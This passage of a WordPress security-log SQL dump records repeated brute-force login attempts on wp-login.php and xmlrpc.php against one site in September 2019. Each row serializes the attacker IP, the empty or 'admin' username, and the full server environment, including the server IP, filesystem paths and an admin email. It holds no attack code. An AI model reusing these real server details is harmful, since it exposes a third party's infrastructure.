11:24:17',18253576,19553384,'https://bintara.com.my/xmlrpc.php',1,0,'120.79.15.181'),(24091,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.214.137\";s:11:\"REMOTE_PORT\";s:5:\"57498\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9yMnPgbK7GuRh1kKnHggAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568633400.6967\";s:12:\"REQUEST_TIME\";s:10:\"1568633400\";}}','notice','2019-09-16 11:30:06','2019-09-16 11:30:04',17739176,19230128,'https://bintara.com.my/wp-login.php',1,0,'162.144.214.137'),(24092,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.144.214.137\";s:11:\"REMOTE_PORT\";s:5:\"33028\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9yRHPgbK7GuRh1kKnHjAAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568633418.521\";s:12:\"REQUEST_TIME\";s:10:\"1568633418\";}}','notice','2019-09-16 11:30:23','2019-09-16 11:30:22',18256224,19552664,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.214.137'),(24093,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.175.6\";s:11:\"REMOTE_PORT\";s:5:\"55148\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX91sGf5CPZPc3WLyovAbAAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568634288.7327\";s:12:\"REQUEST_TIME\";s:10:\"1568634288\";}}','notice','2019-09-16 11:44:50','2019-09-16 11:44:49',17739936,19231656,'https://bintara.com.my/wp-login.php',1,0,'128.199.175.6'),(24094,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.175.6\";s:11:\"REMOTE_PORT\";s:5:\"55498\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX91s3PgbK7GuRh1kKnJ7gAAAIY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568634291.1496\";s:12:\"REQUEST_TIME\";s:10:\"1568634291\";}}','notice','2019-09-16 11:44:52','2019-09-16 11:44:51',18255984,19555632,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.175.6'),(24095,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"38146\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9193PgbK7GuRh1kKnKDQAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568634359.3713\";s:12:\"REQUEST_TIME\";s:10:\"1568634359\";}}','notice','2019-09-16 11:46:00','2019-09-16 11:45:59',17743448,19229904,'https://bintara.com.my/wp-login.php',1,0,'162.241.182.166'),(24096,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"38146\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9193PgbK7GuRh1kKnKDQAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568634359.3713\";s:12:\"REQUEST_TIME\";s:10:\"1568634359\";}}','notice','2019-09-16 11:46:01','2019-09-16 11:45:59',17905272,19229904,'https://bintara.com.my/wp-login.php',1,0,'162.241.182.166'),(24097,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"38624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX91@mf5CPZPc3WLyovAgwAAAM8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568634362.5622\";s:12:\"REQUEST_TIME\";s:10:\"1568634362\";}}','notice','2019-09-16 11:46:03','2019-09-16 11:46:02',18255488,19555728,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.182.166'),(24098,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.203.88.120\";s:11:\"REMOTE_PORT\";s:5:\"53586\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX93M2CCaIOMm5l5jJFBcAAAAQs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568634675.7297\";s:12:\"REQUEST_TIME\";s:10:\"1568634675\";}}','notice','2019-09-16 11:51:16','2019-09-16 11:51:16',17738560,19228168,'https://bintara.com.my/wp-login.php',1,0,'159.203.88.120'),(24099,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.203.88.120\";s:11:\"REMOTE_PORT\";s:5:\"54140\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX93Nmf5CPZPc3WLyovAugAAANM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568634678.6749\";s:12:\"REQUEST_TIME\";s:10:\"1568634678\";}}','notice','2019-09-16 11:51:20','2019-09-16 